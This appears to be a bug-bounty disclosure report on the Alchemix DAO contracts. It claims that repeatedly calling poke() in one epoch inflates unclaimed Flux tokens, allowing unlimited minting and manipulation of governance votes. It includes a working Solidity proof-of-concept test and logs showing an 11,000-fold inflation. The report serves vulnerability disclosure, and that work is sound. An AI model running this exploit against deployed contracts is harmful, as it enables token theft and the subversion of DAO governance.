Manipulation of governance voting result deviating from voted outcome and resulting in a direct change from intended effect of original results
Description
Description
Brief/Intro
Flux token implements a standard ERC20 token with extra features. Flux tokens are accrued by users of VotingEscrow when voting in the contract Voter. Flux tokens can be used to: i) exit a ve-position early by paying a penalty fee when calling function startCooldown, ii) boost voting power of a NFT holder in contract Voter, or iii) as a normal ERC20 token that can be traded in other systems.
So Flux tokens can be used to boost the voting power of a NFT holder. It is shown in the code of vote() function as below.
functionclaimableFlux(uint256_tokenId) publicviewreturns (uint256) {// If the lock is expired, no flux is claimable at the current epochif (block.timestamp > locked[_tokenId].end) {return0; }// Amount of flux claimable is <fluxPerVeALCX> percent of the balancereturn (_balanceOfTokenAt(_tokenId, block.timestamp) * fluxPerVeALCX) / BPS; }
So according to the design of the Alchemix DAO system, if an user have a locked tokenID then with balanceA then the user can get maximum Fluxtoken for 1 epoch is
Now an attacker can mint unlimited times of the amount of Flux Token for 1 epoch intended by the Alchemix DAO system by the using the same amount of capital.
So if an user have locked 10 * 10 ** 18 BPT token for 2 weeks, then the maximal amount of flux tokens can be claimed in 1 epoch is:
functionpoke(uint256_tokenId) public {// Previous boost will be taken into account with weights being pulled from the votes mappinguint256 _boost =0;if (msg.sender != admin) {require(IVotingEscrow(veALCX).isApprovedOrOwner(msg.sender, _tokenId),"not approved or owner"); }address[] memory _poolVote = poolVote[_tokenId];uint256 _poolCnt = _poolVote.length;uint256[] memory _weights =newuint256[](_poolCnt);for (uint256 i =0; i < _poolCnt; i++) { _weights[i] = votes[_tokenId][_poolVote[i]]; }_vote(_tokenId, _poolVote, _weights, _boost); }
This function call will call _vote() internal function then call accrueFlux function of contract FluxToken
Now this tokenId1 has the balanceTokenId1 => unclaimedFlux[_tokenId] += amount
Since the poke() function allows the owner of the tokenId to call this function unlimited times during the same EPOCH. Every time the poke() function is called, then the unclaimedFlux is added one more time.
By repeatedly call poke() function, the attacker will get more Flux token unlimited times of the current intended amount. When have more flux token, the attacker can use it as boost to manipulate the system to manipulate governance.
Impacts
About the severity assessment
The impact is that the attacker will be able to exploit the system to get unlimited times bigger Flux token for the same capital.
Since the Flux tokens can be used to boost the Voting power in Vote function and can manipulate the governance voting result. The attacker can also mint Flux token to get benefit as the Flux token can be traded for other assets as stated by the protocol document.
The severity: Critial
Category:
Manipulation of governance voting result deviating from voted outcome and resulting in a direct change from intended effect of original results
Unauthorized or malicious minting of Flux token
Capital for the attack: Gas to execute the transactions.
Amount of BPT can be small just to create lock position.
Easy to exploit and easy to be automated.
Please note that this bug is different from bug: Report 39030 (https://bugs.immunefi.com/dashboard/submission/39030) was reported by me. Because the bug 39030 describes the exploit using poke() and merge() function. The attack there is more complex and related to merge() functionality. For bug 39030, the attacker can mint only several times of the amount of Flux token.
This bug involves only exploit of poke() function. For this bug the attacker can mint unlimited amount of Flux token.
Proof of concept
Proof of concept
testFluxAccrual_Poke_Hacked()
I created the POC for exploit scenario
The POC code:
functiontestFluxAccrual_Poke_Hacked() public {address attacker =address(this); console2.log("Start to createLock with _maxLockEnabled is false and value is 1e18 BPT");uint256 tokenId1 =createVeAlcx(attacker,10*TOKEN_1,2weeks,false); IVotingEscrow_1.LockedBalance memory _lock =IVotingEscrow_1(address(veALCX)).locked(tokenId1); console2.log("LockedBalance of tokenId1 lock.amount: %s ", _lock.amount); console2.log("LockedBalance of tokenId1 _lock.end: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.cooldown: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.maxLockEnabled: %s ", _lock.maxLockEnabled); console2.log("Call voter.poke(tokenId1)");uint256 count =11000; for (uint256 i =0; i < count; ++i) { voter.poke(tokenId1); } console2.log("After having unclaimFlux, attacker can use to boost voting power or mint Flux token"); console2.log("Flux token balance of the attacker: %s",flux.balanceOf(attacker)); console2.log("Call unclaimedFlux to mint Flux token for the attacker"); uint256 unclaimedFlux = flux.getUnclaimedFlux(tokenId1); flux.claimFlux(tokenId1,unclaimedFlux); console2.log("After claiming: Flux token balance of the attacker: %s",flux.balanceOf(attacker));}
In this POC, I use 10 * 10**18 BPT token. The attacker create 10 tokenIds and repeately call poke(tokenId) and merge
The log shows:
[PASS] testFluxAccrual_Poke_Hacked() (gas: 175256241)
Logs:
Start to createLock with _maxLockEnabled is false and value is 1e18 BPT
LockedBalance of tokenId1 lock.amount: 10000000000000000000
LockedBalance of tokenId1 _lock.end: 1716422400
LockedBalance of tokenId1 _lock.cooldown: 1716422400
LockedBalance of tokenId1 _lock.maxLockEnabled: false
Call voter.poke(tokenId1)
After having unclaimFlux, attacker can use to boost voting power or mint Flux token
Flux token balance of the attacker: 0
Call unclaimedFlux to mint Flux token for the attacker
After claiming: Flux token balance of the attacker: 2970631341957030257000
So at the end of the attack: the attacker still have a tokenId with amount: 10000000000000000000 = 10 ** 18 Lock duration: 2 weeks.
So the attacker still can withdraw his capital of BPT token as normal.
The unclaimedFlux of tokenId1: 2970631341957030257000
testFluxAccrual_Poke_Normal()
I also created the normal scenario where a user lock 10 ** 10**18 BPT token.
functiontestFluxAccrual_Poke_Normal() public {address attacker =address(this); console2.log("Start to createLock with _maxLockEnabled is false and value is 1e18 BPT");uint256 tokenId1 =createVeAlcx(attacker,10*TOKEN_1,2weeks,false); IVotingEscrow_1.LockedBalance memory _lock =IVotingEscrow_1(address(veALCX)).locked(tokenId1); console2.log("LockedBalance of tokenId1 lock.amount: %s ", _lock.amount); console2.log("LockedBalance of tokenId1 _lock.end: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.cooldown: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.maxLockEnabled: %s ", _lock.maxLockEnabled); console2.log("Call voter.poke(tokenId1)"); voter.poke(tokenId1);uint256 unclaimedFlux = flux.getUnclaimedFlux(tokenId1); console2.log("unclaimedFlux1: %s", unclaimedFlux); console2.log("After having unclaimFlux, attacker can use to boost voting power or mint Flux token"); console2.log("Flux token balance of the attacker: %s",flux.balanceOf(attacker)); console2.log("Call unclaimedFlux to mint Flux token for the attacker"); flux.claimFlux(tokenId1,unclaimedFlux); console2.log("After claiming: Flux token balance of the attacker: %s",flux.balanceOf(attacker)); }
The log of this test case shows:
[PASS] testFluxAccrual_Poke_Normal() (gas: 1296670)
Logs:
Start to createLock with _maxLockEnabled is false and value is 1e18 BPT
LockedBalance of tokenId1 lock.amount: 10000000000000000000
LockedBalance of tokenId1 _lock.end: 1716422400
LockedBalance of tokenId1 _lock.cooldown: 1716422400
LockedBalance of tokenId1 _lock.maxLockEnabled: false
Call voter.poke(tokenId1)
unclaimedFlux1: 270057394723366387
After having unclaimFlux, attacker can use to boost voting power or mint Flux token
Flux token balance of the attacker: 0
Call unclaimedFlux to mint Flux token for the attacker
After claiming: Flux token balance of the attacker: 270057394723366387
So the unclaimedFlux1 of the tokenID1 is 270057394723366387
To compare, the attacker get 11_000 times bigger that is the number of loops. So attackers can repeat this and get the unlimited token of Flux token.
So attacker can use the gained Flux token to boost the voting power.
In this POC, I demonstrated that the attacker can mint Flux token.
Flux token balance of the attacker: 0
Call unclaimedFlux to mint Flux token for the attacker
After claiming: Flux token balance of the attacker: 2970631341957030257000
Full POC Code:
To run the test Copy the test code into the file:
functiontestFluxAccrual_Poke_Hacked() public {address attacker =address(this); console2.log("Start to createLock with _maxLockEnabled is false and value is 1e18 BPT");uint256 tokenId1 =createVeAlcx(attacker,10*TOKEN_1,2weeks,false); IVotingEscrow_1.LockedBalance memory _lock =IVotingEscrow_1(address(veALCX)).locked(tokenId1); console2.log("LockedBalance of tokenId1 lock.amount: %s ", _lock.amount); console2.log("LockedBalance of tokenId1 _lock.end: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.cooldown: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.maxLockEnabled: %s ", _lock.maxLockEnabled); console2.log("Call voter.poke(tokenId1)");uint256 count =11000; for (uint256 i =0; i < count; ++i) { voter.poke(tokenId1); } console2.log("After having unclaimFlux, attacker can use to boost voting power or mint Flux token"); console2.log("Flux token balance of the attacker: %s",flux.balanceOf(attacker)); console2.log("Call unclaimedFlux to mint Flux token for the attacker"); uint256 unclaimedFlux = flux.getUnclaimedFlux(tokenId1); flux.claimFlux(tokenId1,unclaimedFlux); console2.log("After claiming: Flux token balance of the attacker: %s",flux.balanceOf(attacker)); }functiontestFluxAccrual_Poke_Normal() public {address attacker =address(this); console2.log("Start to createLock with _maxLockEnabled is false and value is 1e18 BPT");uint256 tokenId1 =createVeAlcx(attacker,10*TOKEN_1,2weeks,false); IVotingEscrow_1.LockedBalance memory _lock =IVotingEscrow_1(address(veALCX)).locked(tokenId1); console2.log("LockedBalance of tokenId1 lock.amount: %s ", _lock.amount); console2.log("LockedBalance of tokenId1 _lock.end: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.cooldown: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.maxLockEnabled: %s ", _lock.maxLockEnabled); console2.log("Call voter.poke(tokenId1)"); voter.poke(tokenId1);uint256 unclaimedFlux = flux.getUnclaimedFlux(tokenId1); console2.log("unclaimedFlux1: %s", unclaimedFlux); console2.log("After having unclaimFlux, attacker can use to boost voting power or mint Flux token"); console2.log("Flux token balance of the attacker: %s",flux.balanceOf(attacker)); console2.log("Call unclaimedFlux to mint Flux token for the attacker"); flux.claimFlux(tokenId1,unclaimedFlux); console2.log("After claiming: Flux token balance of the attacker: %s",flux.balanceOf(attacker)); }}